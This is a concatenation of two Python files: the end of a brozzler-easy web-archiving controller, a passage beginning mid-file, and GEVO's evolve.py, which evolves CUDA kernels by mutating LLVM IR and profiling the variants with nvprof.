db=args.rethinkdb_db, table='captures')
},
},
# 'enable_http_proxy': True,
# 'enable_memento': True,
'archive_paths': warcs_dir,
'enable_cdx_api': True,
'framed_replay': True,
'port': args.pywb_port,
'enable_auto_colls': False,
}
wsgi_app = pywb.framework.wsgi_wrappers.init_app(
pywb.webapp.pywb_init.create_wb_router, config=conf,
load_yaml=False)
# disable is_hop_by_hop restrictions
wsgiref.handlers.is_hop_by_hop = lambda x: False
return wsgiref.simple_server.make_server(
args.pywb_address, args.pywb_port, wsgi_app,
ThreadingWSGIServer)
def start(self):
self.logger.info('starting warcprox')
self.warcprox_controller.start()
# XXX wait til fully started?
self.logger.info('starting brozzler-worker')
self.brozzler_worker.start()
self.logger.info(
'starting pywb at %s:%s', *self.pywb_httpd.server_address)
threading.Thread(target=self.pywb_httpd.serve_forever).start()
self.logger.info(
'starting brozzler-dashboard at %s:%s',
*self.dashboard_httpd.server_address)
threading.Thread(target=self.dashboard_httpd.serve_forever).start()
def shutdown(self):
self.logger.info('shutting down brozzler-dashboard')
self.dashboard_httpd.shutdown()
self.logger.info('shutting down brozzler-worker')
self.brozzler_worker.shutdown_now()
# brozzler-worker is fully shut down at this point
self.logger.info('shutting down pywb')
self.pywb_httpd.shutdown()
self.logger.info('shutting down warcprox')
self.warcprox_controller.shutdown()
def wait_for_shutdown_request(self):
try:
while not self.stop.is_set():
time.sleep(0.5)
finally:
self.shutdown()
def _warcprox_args(self, args):
'''
Takes args as produced by the argument parser built by
_build_arg_parser and builds warcprox arguments object suitable to pass
to warcprox.main.init_controller. Copies some arguments, renames some,
populates some with defaults appropriate for brozzler-easy, etc.
'''
warcprox_args = argparse.Namespace()
warcprox_args.address = 'localhost'
# let the OS choose an available port; discover it later using
# sock.getsockname()[1]
warcprox_args.port = 0
warcprox_args.cacert = args.cacert
warcprox_args.certs_dir = args.certs_dir
warcprox_args.directory = args.warcs_dir
warcprox_args.gzip = True
warcprox_args.prefix = 'brozzler'
warcprox_args.size = 1000 * 1000* 1000
warcprox_args.rollover_idle_time = 3 * 60
warcprox_args.digest_algorithm = 'sha1'
warcprox_args.base32 = True
warcprox_args.stats_db_file = None
warcprox_args.playback_port = None
warcprox_args.playback_index_db_file = None
warcprox_args.rethinkdb_servers = args.rethinkdb_servers
warcprox_args.rethinkdb_db = args.rethinkdb_db
warcprox_args.rethinkdb_big_table = True
warcprox_args.kafka_broker_list = None
warcprox_args.kafka_capture_feed_topic = None
warcprox_args.queue_size = 500
warcprox_args.max_threads = None
warcprox_args.profile = False
warcprox_args.onion_tor_socks_proxy = args.onion_tor_socks_proxy
return warcprox_args
def dump_state(self, signum=None, frame=None):
state_strs = []
for th in threading.enumerate():
state_strs.append(str(th))
stack = traceback.format_stack(sys._current_frames()[th.ident])
state_strs.append(''.join(stack))
logging.warn('dumping state (caught signal {})\n{}'.format(
signum, '\n'.join(state_strs)))
def main(argv=None):
argv = argv or sys.argv
arg_parser = _build_arg_parser(argv)
args = arg_parser.parse_args(args=argv[1:])
brozzler.cli.configure_logging(args)
controller = BrozzlerEasyController(args)
signal.signal(signal.SIGTERM, lambda a,b: controller.stop.set())
signal.signal(signal.SIGINT, lambda a,b: controller.stop.set())
signal.signal(signal.SIGQUIT, controller.dump_state)
controller.start()
controller.wait_for_shutdown_request()
|
evolve.py | #!/usr/bin/env python3
import subprocess
import random
import csv
import json
import pickle
import pathlib
import sys
import filecmp
import logging
import io
import os
import time
import gc
import shutil
from itertools import cycle
from threading import Thread
from threading import Event
from threading import Lock
# Avoid Not-Find-Display problem
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from deap import base
from deap import creator
from deap import tools
import pptx
import psutil
from rich import print
import rich.progress
from rich.progress import Progress
from rich.logging import RichHandler
import pycuda.driver as cuda
from gevo import irind
from gevo.irind import edits_as_key, llvmMutateWrap
from gevo import fuzzycompare, variancecalc
# critical section of multithreading
lock = Lock()
class evolution:
# Parameters
cudaPTX = 'gevo.ptx'
editFitMap = {}
# Content
pop = []
threadPool = []
teminateEvent = Event()
generation = 0
presentation = pptx.Presentation()
mutStats = {
'failDistribution': {'-1': 0},
'valid':0, 'invalid':0, 'infinite':0,
'op_success':{
'c':0, 'r':0, 'i':0, 's':0, 'm':0, 'p':0, 'x':0
},
'op_fail':{
'c':0, 'r':0, 'i':0, 's':0, 'm':0, 'p':0, 'x':0
},
}
evalStats = {'cx':{'pass':[0],'fail':[0]}, 'mut':{'pass':[0],'fail':[0]}, 'epi':{'pass':[0],'fail':[0]}}
class _testcase:
def __init__(self, evolution, idx, kernel, bin, verifier, n_samples=100):
self.idx = idx
self.num_samples = n_samples
self.kernels = kernel
self.appBinary = bin
self.verifier = verifier
self.args = []
self.golden = []
self.variance = []
self._evolution = evolution
def evaluate(self):
# Since golden has been filled up, passing this testcase into resultcompare
# won't compare anything which is exactly what we want.
fitness = []
# Evaluate {self.num_samples} times and get the minimum number
golden_run = []
for i in range(self.num_samples):
fitness.append(self._evolution.execNVprofRetrive(self))
if None in fitness:
print(self.args)
raise Exception("Original binary execution error")
if self.verifier['mode'] == 'file':
for fname in self.verifier['output']:
golden_run_filename = f"{fname}.golden{str(self.idx)}.{i}"
os.rename(fname, golden_run_filename)
golden_run.append(golden_run_filename)
variancecalc.file(golden_run)
if self.verifier['mode'] == 'file':
for fname in self.verifier['output']:
golden_filename = f"{fname}.golden{str(self.idx)}"
self.golden.append(golden_filename)
self.fitness = (min([ value[0] for value in fitness ]), min([ value[1] for value in fitness ]))
if None in self.fitness:
print(self.args)
raise Exception("Original binary execution error")
def __init__(self, kernel, bin, profile, mutop, timeout=30, fitness='time', popsize=128,
llvm_src_filename='cuda-device-only-kernel.ll', use_fitness_map=True, combine_positive_epistasis=False,
CXPB=0.8, MUPB=0.1, err_rate='0.01', global_seed=None):
self.CXPB = CXPB
self.MUPB = MUPB
self.err_rate = err_rate
self.kernels = kernel
self.appBinary = bin
self.timeout = timeout
self.fitness_function = fitness
self.use_fitness_map = use_fitness_map
self.combine_positive_epistasis = combine_positive_epistasis
self.popsize = popsize
self.mutop = mutop.split(',')
self.rng = {}
if global_seed is not None:
random.seed(global_seed)
try:
with open(llvm_src_filename, 'r') as f:
self.initSrcEnc = f.read().encode()
except IOError:
print("File {} does not exist".format(llvm_src_filename))
exit(1)
self.verifier = profile['verify']
# Tools initialization
# Detect GPU property
cuda.init()
# TODO: check if there are multiple GPUs.
SM_MAJOR, SM_MINOR = cuda.Device(0).compute_capability()
self.mgpu = 'sm_' + str(SM_MAJOR) + str(SM_MINOR)
print(f'[Initializing GEVO] GPU compute capability: {self.mgpu}')
# check Nvidia Profiler exists
self.nvprof_path = shutil.which('nvprof')
if self.nvprof_path is None:
raise Exception('nvprof cannot be found')
print(f'[Initializing GEVO] nvprof detected: {self.nvprof_path}')
# Minimize both performance and error
creator.create("FitnessMin", base.Fitness, weights=(-1.0, -1.0))
creator.create("Individual", irind.llvmIRrep, fitness=creator.FitnessMin)
self.history = tools.History()
self.toolbox = base.Toolbox()
self.toolbox.register('mutate', self.mutLLVM)
self.toolbox.register('mate', self.cxOnePointLLVM)
# self.toolbox.register('select', tools.selDoubleTournament, fitness_size=2, parsimony_size=1.4, fitness_first=True)
self.toolbox.register('select', tools.selNSGA2)
self.toolbox.register('individual', creator.Individual, srcEnc=self.initSrcEnc, mgpu=self.mgpu)
self.toolbox.register('population', tools.initRepeat, list, self.toolbox.individual)
# Decorate the variation operators
self.toolbox.decorate("mate", self.history.decorator)
self.toolbox.decorate("mutate", self.history.decorator)
self.stats = tools.Statistics(lambda ind: ind.fitness.values)
self.stats.register("min", min)
self.stats.register("max", max)
self.logbook = tools.Logbook()
self.paretof = tools.ParetoFront()
self.logbook.header = "gen", "evals", "min", "max"
# Set up testcase
self.origin = creator.Individual(self.initSrcEnc, self.mgpu)
self.origin.ptx(self.cudaPTX)
arg_array = [[]]
for i, arg in enumerate(profile['args']):
if arg.get('bond', None) is None:
arg_array_next = [ e[:] for e in arg_array for _ in range(len(arg['value']))]
arg_array = arg_array_next
for e1, e2 in zip(arg_array, cycle(arg['value'])):
e1.append(e2)
else:
for e in arg_array:
bonded_arg = arg['bond'][0]
bonded_idx = profile['args'][bonded_arg]['value'].index(e[bonded_arg])
e.append(arg['value'][bonded_idx])
arg_array = [ [str(e) for e in args ] for args in arg_array ]
self.testcase = []
for i in range(len(arg_array)):
self.testcase.append( self._testcase(self, i, kernel, bin, profile['verify']) )
with Progress("[Initializing GEVO] Evaluate original program with test cases",
"({task.completed} / {task.total})",
rich.progress.TimeElapsedColumn()) as progress:
task = progress.add_task("", total=len(arg_array))
for tc, arg in zip(self.testcase, arg_array):
tc.args = arg
tc.evaluate()
progress.update(task, advance=1)
# Calculate variance
self.ofits = [ tc.fitness[0] for tc in self.testcase]
self.oerrs = [ tc.fitness[1] for tc in self.testcase]
self.origin.fitness.values = (sum(self.ofits)/len(self.ofits), max(self.oerrs))
self.editFitMap[tuple()] = self.origin.fitness.values
print(f"Average fitness of the original program: ({self.origin.fitness.values[0]:.2f}, {self.origin.fitness.values[1]:.2f})")
print("Individual test cases:")
for fit, err in zip(self.ofits, self.oerrs):
print(f"\t({fit:.2f}, {err:.2f})")
self.positive_epistasis = {}
self.negative_epistasis = {}
self.need_discussion = {}
def updateSlideFromPlot(self):
pffits = [ind.fitness.values for ind in self.paretof]
fits = [ind.fitness.values for ind in self.pop if ind.fitness.values not in pffits]
plt.gcf().subplots_adjust(bottom=0.15)
plt.title("Program variant performance - Generation {}".format(self.generation))
plt.xlabel("Runtime(ms)")
plt.ylabel("Error(%)")
if self.err_rate[-1] == '|':
err_rate = float(self.err_rate[0:-2])
elif self.err_rate[-1] == 's':
err_rate = float(self.err_rate[0:-2])
else:
float(self.err_rate)
plt.ylim(ymin=-(float(err_rate)*100/20), ymax=float(err_rate)*100)
plt.xticks(rotation=45)
plt.scatter([fit[0]/1000 for fit in fits], [fit[1]*100 for fit in fits],
marker='*', label="dominated")
plt.scatter([pffit[0]/1000 for pffit in pffits], [pffit[1]*100 for pffit in pffits],
marker='o', c='red', label="pareto front")
plt.scatter(self.origin.fitness.values[0]/1000, self.origin.fitness.values[1]*100,
marker='x', c='green', label="origin")
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
slide = self.presentation.slides.add_slide(self.presentation.slide_layouts[6])
left = top = pptx.util.Inches(1)
pic = slide.shapes.add_picture(buf, left, top)
buf.close()
self.presentation.save('progress.pptx')
plt.clf()
def writeStage(self):
pathlib.Path('stage').mkdir(exist_ok=True)
if self.generation == 0:
stageFileName = "stage/startedits.json"
rngFileName = "stage/startrng.pickle"
else:
stageFileName = "stage/" + str(self.generation) + ".json"
rngFileName = "stage/" + str(self.generation) + "_rng.pickle"
with open(stageFileName, 'w') as fp:
stage = [{'edits': ind.edits, 'fitness': ind.fitness.values} for ind in self.pop]
json.dump(stage, fp, indent=2)
rng_state = {}
rng_state['global'] = random.getstate()
rng_state['cx'] = self.rng['cx'].getstate()
rng_state['mut'] = self.rng['mut'].getstate()
rng_state['cx_local'] = [ rng.getstate() for rng in self.rng['cx_local']]
rng_state['mut_local'] = [ rng.getstate() for rng in self.rng['mut_local']]
with open(rngFileName, 'wb') as fp:
pickle.dump(rng_state, fp)
def mutLog(self):
print("gen {}".format(self.generation), file=self.mutLogFile)
print("Individual mutation opeartion statistic", file=self.mutLogFile)
print(" | c r i s m p", file=self.mutLogFile)
print("success|{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}".format(
self.mutStats['op_success']['c'],
self.mutStats['op_success']['r'],
self.mutStats['op_success']['i'],
self.mutStats['op_success']['s'],
self.mutStats['op_success']['m'],
self.mutStats['op_success']['p'],
), file=self.mutLogFile)
print("fail |{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}".format(
self.mutStats['op_fail']['c'],
self.mutStats['op_fail']['r'],
self.mutStats['op_fail']['i'],
self.mutStats['op_fail']['s'],
self.mutStats['op_fail']['m'],
self.mutStats['op_fail']['p'],
), file=self.mutLogFile)
print("", file=self.mutLogFile)
self.mutLogFile.flush()
numMut = ["Num of Mutation"]
count = ["Count"]
for key in self.mutStats['failDistribution']:
numMut.append(int(key))
count.append(self.mutStats['failDistribution'][key])
mutDistWrite = csv.writer(self.mutDistFile, quoting=csv.QUOTE_NONNUMERIC)
mutDistWrite.writerow(["Gen {}".format(self.generation)])
mutDistWrite.writerow(numMut)
mutDistWrite.writerow(count)
self.mutDistFile.flush()
def resultCompare(self, stdoutStr, testcase):
err = 0.0
if self.verifier['mode'] == 'string':
src = self.verifier['output']
golden = testcase.golden
result = False if src.find(golden) == -1 else True
return result, err
elif self.verifier['mode'] == 'thundersvm':
for line in stdoutStr.splitlines():
if line.find('Cross Accuracy = ') != -1:
accuracy = float(line.replace('Cross Accuracy = ',''))
err = 1 - accuracy
result = False if err > float(self.err_rate) else True
return result, err
return False, err
elif self.verifier['mode'] == 'caffe2':
for line in stdoutStr.splitlines():
if line.find('Accuracy = ') != -1:
accuracy = float(line.replace('Accuracy = ',''))
err = 1 - accuracy
result = False if err > float(self.err_rate) else True
return result, err
return False, err
elif self.verifier['mode'] == 'file':
src = self.verifier['output']
golden = testcase.golden
result = True
for cnt, (s, g) in enumerate(zip(src, golden)):
fuzzy = self.verifier.get('fuzzy', False)
if isinstance(fuzzy, list):
try:
fuzzy = fuzzy[cnt]
except IndexError:
print("Verification Error: Fuzzy mode is a list but does not match the number of output files")
elif isinstance(fuzzy, bool):
pass
else:
raise Exception("Verification Error: fuzzy mode is not a single or a list of the boolean value")
if fuzzy:
try:
if self.err_rate[-1] == 's':
rc, maxerr, avgerr = fuzzycompare.file(s, f"{g}.mean", self.err_rate, f"{g}.stddev")
else:
rc, maxerr, avgerr = fuzzycompare.file(s, g, self.err_rate)
except IndexError:
return False, 1
# if rc < 0:
# raise Exception(msg)
result = result & (True if rc==0 else False)
err = maxerr if maxerr > err else err
else:
try:
result = result & filecmp.cmp(s, g)
except IOError:
print(f"Verification Error: File {src} or {golden} cannot be found")
return result, err
else:
raise Exception("Verification Error: Unknown comparing mode \"{}\" in the json profile".format(
self.verifier['mode']))
def identify_positive_epistasis(self, ind, updateEpiTable=True):
if (len(ind.edits) < 2):
return
tmp_edits = list(ind.edits)
ret_edits = []
while len(tmp_edits) != 0:
edit = tmp_edits[0]
if isinstance(edit, irind.edit):
mut_fields = edit[0][1].split(',')
on_mutated_instruction = False
for mut_field in mut_fields:
try:
suffix = mut_field.split('.', maxsplit=1)[1]
if suffix.find('OP') == -1:
on_mutated_instruction = True
break
except IndexError:
pass
if on_mutated_instruction:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
else:
# complex edit cannot fail the test, thus won't depends on other.
# Only other depend on them
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
edit_key = edits_as_key([edit])
if edit_key not in self.editFitMap.keys():
if updateEpiTable:
tmp_ind = creator.Individual(self.initSrcEnc, self.mgpu, [edit])
with lock:
self.evaluate(tmp_ind, 'epi')
else:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
if None not in self.editFitMap[edit_key]:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
# Epistasis found. Check if epistasis map already has the record
rest = [ e for e in (tmp_edits+ret_edits) if e != edit ]
with lock:
if edit in self.positive_epistasis.keys():
found = False
for dependant in self.positive_epistasis[edit]:
if dependant in rest:
found = True
tmp_edits.remove(edit)
if dependant in ret_edits:
ret_edits.remove(dependant)
else:
tmp_edits.remove(dependant)
ret_edits.append(tuple([edit, dependant]))
break
if found:
continue
if updateEpiTable:
identified = False
for e_rest in rest:
if edits_as_key([edit, e_rest]) not in self.editFitMap:
tmp_ind = creator.Individual(self.initSrcEnc, self.mgpu, [edit, e_rest])
self.evaluate(tmp_ind, 'epi')
if None not in self.editFitMap[edits_as_key([edit, e_rest])]:
if e_rest in ret_edits:
ret_edits.remove(e_rest)
else:
tmp_edits.remove(e_rest)
tmp_edits.remove(edit)
ret_edits.append(tuple([edit, e_rest]))
if e_rest not in self.positive_epistasis.setdefault(edit, []):
self.positive_epistasis[edit].append(e_rest)
identified = True
break
if identified is True:
continue
else:
self.need_discussion.setdefault(edit, []).append(rest)
ret_edits.append(edit)
tmp_edits.remove(edit)
assert(edits_as_key(ret_edits) == ind.key)
ind.update_edits(ret_edits)
def mutLLVM(self, individual, rng:random.Random):
trial = 0
operations = self.mutop
while trial < individual.lineSize*2:
if self.teminateEvent.is_set():
return individual,
line1 = rng.randint(1, individual.lineSize)
line2 = rng.randint(1, individual.lineSize)
while line1 == line2:
line2 = rng.randint(1, individual.lineSize)
seed = rng.getrandbits(16)
op = rng.choice(operations)
if op == 'p' or op == 'x':
rc, _, editUID = llvmMutateWrap(individual.srcEnc, op, str('Rand'), str('Rand'), seed)
else:
rc, _, editUID = llvmMutateWrap(individual.srcEnc, op, str(line1), str(line2), seed)
if rc < 0:
continue
if editUID in individual.serialized_edits:
continue
try:
test_ind = creator.Individual(self.initSrcEnc, self.mgpu, individual.edits + [editUID])
except irind.llvmIRrepRuntimeError:
continue
with lock:
if self.teminateEvent.is_set():
return individual,
trial = trial + 1
fit = self.evaluate(test_ind, 'mut')
if None in fit:
self.mutStats['invalid'] = self.mutStats['invalid'] + 1
self.mutStats['op_fail'][op] = self.mutStats['op_fail'][op] + 1
continue
self.mutStats['valid'] = self.mutStats['valid'] + 1
self.mutStats['op_success'][op] = self.mutStats['op_success'][op] + 1
self.mutStats['failDistribution'][str(trial)] = \
self.mutStats['failDistribution'][str(trial)] + 1 \
if str(trial) in self.mutStats['failDistribution'] else 1
if self.combine_positive_epistasis:
self.identify_positive_epistasis(test_ind, updateEpiTable=False)
individual.copy_from(test_ind)
individual.fitness.values = fit
return individual,
print("Cannot get mutant to survive in {} trials".format(individual.lineSize*2))
self.mutStats['failDistribution']['-1'] = self.mutStats['failDistribution']['-1'] + 1
with lock:
fit = self.evaluate(individual, 'mut')
individual.fitness.values = fit
return individual,
def cxOnePointLLVM(self, ind1, ind2, rng:random.Random):
trial = 0
if ind1 == ind2:
return ind1, ind2
editSet1 = set(ind1.edits)
editSet2 = set(ind2.edits)
# The following sorting it to make the order deterministic
intersectionEdits = sorted(list(editSet1.intersection(editSet2)))
symmetricEdits = sorted(list(editSet1.symmetric_difference(editSet2)))
if len(symmetricEdits) == 1:
return ind1, ind2
while trial < len(ind1.edits) + len(ind2.edits):
if self.teminateEvent.is_set():
return ind1, ind2
rng.shuffle(symmetricEdits)
point = rng.randint(1, len(symmetricEdits)-1)
cmd1 = intersectionEdits + symmetricEdits[:point]
cmd2 = intersectionEdits + symmetricEdits[point:]
try:
child1 = creator.Individual(self.initSrcEnc, self.mgpu, cmd1)
child2 = creator.Individual(self.initSrcEnc, self.mgpu, cmd2)
except irind.llvmIRrepRuntimeError:
trial = trial + 1
continue
with lock:
if self.teminateEvent.is_set():
return ind1, ind2
fit1 = self.evaluate(child1, 'cx')
fit2 = self.evaluate(child2, 'cx')
trial = trial + 1
if None in fit1 and None in fit2:
continue
if None not in fit1:
ind1.copy_from(child1)
ind1.fitness.values = fit1
if None not in fit2:
ind2.copy_from(child2)
ind2.fitness.values = fit2
return ind1, ind2
print("Cannot get crossover to survive in {} trials".format(len(ind1.edits) + len(ind2.edits)))
return ind1, ind2
def execNVprofRetrive(self, testcase):
proc = subprocess.Popen([self.nvprof_path,
'--unified-memory-profiling', 'off',
# '--profile-from-start', 'off',
'--profile-child-processes',
'--profile-api-trace', 'none',
'--system-profiling', 'on',
'--csv',
'-u', 'us',
'./' + self.appBinary] + testcase.args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
gc.disable()
all_time = time.perf_counter()
stdout, stderr = proc.communicate(timeout=self.timeout) # second
all_time = time.perf_counter() - all_time
gc.enable()
retcode = proc.poll()
# retcode == 9: error is from testing program, not nvprof
# retcode == 15: Target program receive segmentation fault
if retcode == 9 or retcode == 15:
print('x', end='', flush=True)
return None, None
# Unknown nvprof error
if retcode != 0:
print(stderr.decode(), file=sys.stderr)
raise Exception('Unknown nvprof error code:{}'.format(retcode))
except subprocess.TimeoutExpired:
# Sometimes terminating nvprof will not terminate the underlying cuda program
# if that program is corrupted. So issue the kill command to those cuda app first
print('8', end='', flush=True)
try:
parent = psutil.Process(proc.pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for subproc in children:
subproc.terminate()
subprocess.run(['killall', self.appBinary],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.terminate()
proc.wait()
self.mutStats['infinite'] = self.mutStats['infinite'] + 1
return None, None
except KeyboardInterrupt:
return None, None
program_output = stdout.decode()
cmpResult, err = self.resultCompare(program_output, testcase)
if cmpResult is False:
print('x', end='', flush=True)
return None, None
else:
print('.', end='', flush=True)
profile_output = stderr.decode()
csv_list = list(csv.reader(io.StringIO(profile_output), delimiter=','))
# search for kernel function(s)
kernel_time = []
time_percent = []
energy = None
# The stats starts after 5th line
for line in csv_list[5:]:
if len(line) == 0:
continue
if line[0] == "GPU activities":
for name in self.kernels:
# 8th column for name of CUDA function call
try:
if line[7].split('(')[0] == name:
# 3rd column for avg execution time
kernel_time.append(float(line[2]))
time_percent.append(float(line[1]))
except:
continue
if line[0] == "Power (mW)":
count = int(line[2])
avg_power = float(line[3])
# The emprical shows that the sampling frequency is around 50Hz
energy = count * avg_power / 20
if len(self.kernels) == len(kernel_time) and energy is not None:
if self.fitness_function == 'time' or self.fitness_function == 'all_time':
# total_kernel_time = sum(kernel_time)*100 / sum(time_percent)
return all_time, err
# return sum(kernel_time), err
elif self.fitness_function == 'kernel_time':
# total_kernel_time = sum(kernel_time)*100 / sum(time_percent)
total_kernel_time = sum(kernel_time)
return total_kernel_time, err
# return sum(kernel_time), err
elif self.fitness_function == 'power':
return energy, err
else:
print("Can not find kernel \"{}\" from nvprof".format(self.kernels), file=sys.stderr)
return None, None
def evaluate(self, individual, mode=None):
if mode == 'cx':
print('c', end='', flush=True)
elif mode == 'mut':
print('m', end='', flush=True)
elif mode == 'epi':
print('e', end='', flush=True)
# first to check whether we can find the same entry in the editFitmap
editkey = individual.key
if self.use_fitness_map is True:
if editkey in self.editFitMap:
print('r', end='', flush=True)
return self.editFitMap[editkey]
# link
try:
individual.ptx(self.cudaPTX)
except:
self.editFitMap[editkey] = (None, None)
if mode is not None:
self.evalStats[mode]['fail'][-1] = self.evalStats[mode]['fail'][-1] + 1
return None, None
with open('gevo.ll', 'w') as f:
f.write(individual.srcEnc.decode())
fits = []
errs = []
for tc in self.testcase:
fitness, err = self.execNVprofRetrive(tc)
for res_file in self.verifier['output']:
if os.path.exists(res_file):
os.remove(res_file)
if fitness is None or err is None:
self.editFitMap[editkey] = (None, None)
if mode is not None:
self.evalStats[mode]['fail'][-1] = self.evalStats[mode]['fail'][-1] + 1
return None, None
fits.append(fitness)
errs.append(err)
max_err = max(errs)
avg_fitness = sum(fits)/len(fits)
# record the edits and the corresponding fitness in the map
self.editFitMap[editkey] = (avg_fitness, max_err)
if mode is not None:
self.evalStats[mode]['pass'][-1] = self.evalStats[mode]['pass'][-1] + 1
return avg_fitness, max_err
def evolve(self, resumeGen):
self.rng['mut'] = random.Random(random.getrandbits(16))
self.rng['cx'] = random.Random(random.getrandbits(16))
if resumeGen == -1:
# PopSize must be a multiple by 4 for SelTournamentDOD to function properly
popSize = self.popsize
self.rng['mut_local'] = [ random.Random(random.getrandbits(16)) for i in range(popSize) ]
self.rng['cx_local'] = [ random.Random(random.getrandbits(16)) for i in range(popSize) ]
print("Initialize the population. Size {}".format(popSize))
self.pop = self.toolbox.population(n=popSize)
with Progress(auto_refresh=False) as pbar:
task1 = pbar.add_task("", total=popSize)
for cnt, ind in enumerate(self.pop):
pbar.update(task1, completed=cnt+1, refresh=True,
description=f"Initializing Population with 3 mutations({cnt+1}/{popSize}), "\
f"m:(p:{self.evalStats['mut']['pass'][-1]},f:{self.evalStats['mut']['fail'][-1]}), "\
f"c:(p:{self.evalStats['cx']['pass'][-1]},f:{self.evalStats['cx']['fail'][-1]}), "\
f"e:(p:{self.evalStats['epi']['pass'][-1]},f:{self.evalStats['epi']['fail'][-1]})")
_fit = (None, None)
while None in _fit:
_ind1 = creator.Individual(self.initSrcEnc, self.mgpu)
_ind2 = creator.Individual(self.initSrcEnc, self.mgpu)
_ind3 = creator.Individual(self.initSrcEnc, self.mgpu)
self.toolbox.mutate(_ind1, self.rng['mut'])
self.toolbox.mutate(_ind2, self.rng['mut'])
self.toolbox.mutate(_ind3, self.rng['mut'])
_ind = creator.Individual(self.initSrcEnc, self.mgpu, _ind1.edits + _ind2.edits + _ind3.edits)
_fit = self.evaluate(_ind)
ind.copy_from(_ind)
ind.fitness.values = _fit
self.writeStage()
else:
if resumeGen == 0:
stageFileName = "stage/startedits.json"
rngFileName = "stage/startrng.pickle"
else:
stageFileName = "stage/" + str(resumeGen) + ".json"
rngFileName = "stage/" + str(resumeGen) + "_rng.pickle"
try:
stage = json.load(open(stageFileName))
allEdits = [ irind.encode_edits_from_list(entry['edits']) for entry in stage ]
except:
print(f"GEVO Error in loading stage file \"{stageFileName}\"")
print(sys.exc_info())
exit(1)
try:
with open('stage/editmap.pickle', 'rb') as editFitMapFile:
print('[resuming GEVO] Previous EditFitMap found ... ', end='')
self.editFitMap = pickle.load(editFitMapFile)
print(f'{len(self.editFitMap)} entries loaded')
except FileNotFoundError:
pass
popSize = len(allEdits)
try:
print(f'[resuming GEVO] Loading random number generator from {rngFileName} ... ', end='')
with open(rngFileName, 'rb') as fp:
rng_state = pickle.load(fp)
random.setstate(rng_state['global'])
self.rng['cx'].setstate(rng_state['cx'])
self.rng['mut'].setstate(rng_state['mut'])
self.rng['mut_local'] = [ random.Random() for i in range(popSize) ]
for rng, state in zip(self.rng['mut_local'], rng_state['mut_local']):
rng.setstate(state)
self.rng['cx_local'] = [ random.Random() for i in range(popSize) ]
for rng, state in zip(self.rng['cx_local'], rng_state['cx_local']):
rng.setstate(state)
print('done')
except FileNotFoundError:
print(f"GEVO Error in loading rng file \"{rngFileName}\"")
print(sys.exc_info())
exit(1)
print(f"[resuming GEVO] Rebuilding the population from {stageFileName}. Size {popSize}")
self.pop = self.toolbox.population(n=popSize)
self.generation = resumeGen
resultList = [False] * popSize
for i, (edits, ind) in enumerate(zip(allEdits, self.pop)):
ind.update_edits(edits)
self.threadPool.append(
Thread(target=irind.update_from_edits, args=(i, ind, resultList))
)
self.threadPool[-1].start()
for i, ind in enumerate(self.pop):
self.threadPool[i].join()
if resultList[i] == False:
raise Exception(f"Could not reconstruct ind from edits:{ind.edits}")
fitness = self.evaluate(ind)
if None in fitness:
for edit in ind.edits:
print(edit)
raise Exception("Encounter invalid individual during reconstruction")
# if self.combine_positive_epistasis:
# self.identify_positive_epistasis(ind)
ind.fitness.values = fitness
# This is to assign the crowding distance to the individuals
# and also to sort the pop with front rank
self.pop = self.toolbox.select(self.pop, popSize)
self.history.update(self.pop)
record = self.stats.compile(self.pop)
self.paretof.update(self.pop)
self.logbook.record(gen=0, evals=popSize, **record)
print("")
print(self.logbook.stream)
self.updateSlideFromPlot()
self.mutLogFile = open('mut_stat.log', 'w')
self.mutDistFile = open('mut_dist.csv', 'w')
self.mutLog()
self.progressFile = open('progress.csv', 'w')
self.progressFile.write(f'{self.generation},{record["min"][0]},\n')
minExecTime = record["min"][0]
print("")
# pffits = [ind.fitness.values for ind in self.paretof]
# fits = [ind.fitness.values for ind in self.pop if ind not in pffits]
# plt.scatter([fit[0] for fit in fits], [fit[1] for fit in fits], marker='*')
# plt.scatter([pffits[0] for fit in fits], [pffits[1] for fit in fits], marker='o', c=red)
# plt.savefig(str(self.generation) + '.png')
rapid_mutation = False
no_fitness_change = -5 # give more generations at start before rapid mutation
while True:
offspring = tools.selTournamentDCD(self.pop, popSize)
# Clone the selected individuals
offspring = list(map(self.toolbox.clone, offspring))
paretofGen = tools.sortNondominated(self.pop, popSize, first_front_only=True)
paretofGen[0].sort(key=lambda ind: ind.fitness.values[0])
with open("g{}_noerr.ll".format(self.generation), 'w') as f:
f.write(paretofGen[0][-1].srcEnc.decode())
with open("g{}_noerr.edit".format(self.generation), 'w') as f:
print(paretofGen[0][-1].edits, file=f)
with open("g{}_maxerr.ll".format(self.generation), 'w') as f:
f.write(paretofGen[0][0].srcEnc.decode())
with open("g{}_maxerr.edit".format(self.generation), 'w') as f:
print(paretofGen[0][0].edits, file=f)
with open("stage/editmap.pickle", 'wb') as emfile:
pickle.dump(self.editFitMap, emfile)
self.generation = self.generation + 1
for _, value in self.evalStats.items():
value['pass'].append(0)
value['fail'].append(0)
self.threadPool.clear()
for cnt, (child1, child2) in enumerate(zip(offspring[::2], offspring[1::2])):
if len(child1.edits) < 2 and len(child2.edits) < 2:
continue
if self.rng['cx'].random() < self.CXPB:
self.threadPool.append(
Thread(target=self.toolbox.mate, args=(child1, child2, self.rng['cx_local'][cnt])))
self.threadPool[-1].start()
for thread in self.threadPool:
thread.join()
self.threadPool.clear()
for cnt, mutant in enumerate(offspring):
if self.rng['mut'].random() < self.MUPB:
del mutant.fitness.values
self.threadPool.append(
Thread(target=self.toolbox.mutate, args=(mutant, self.rng['mut_local'][cnt])))
self.threadPool[-1].start()
for thread in self.threadPool:
thread.join()
dead_inds = [ ind for ind in self.pop if None in ind.fitness.values ]
assert(len(dead_inds) == 0)
elite = self.toolbox.select(self.pop, int(popSize/64))
if self.combine_positive_epistasis:
for ind in elite:
self.identify_positive_epistasis(ind)
self.pop = self.toolbox.select(elite + offspring, popSize)
record = self.stats.compile(self.pop)
self.logbook.record(gen=self.generation, evals=popSize, **record)
self.paretof.update(self.pop)
print("")
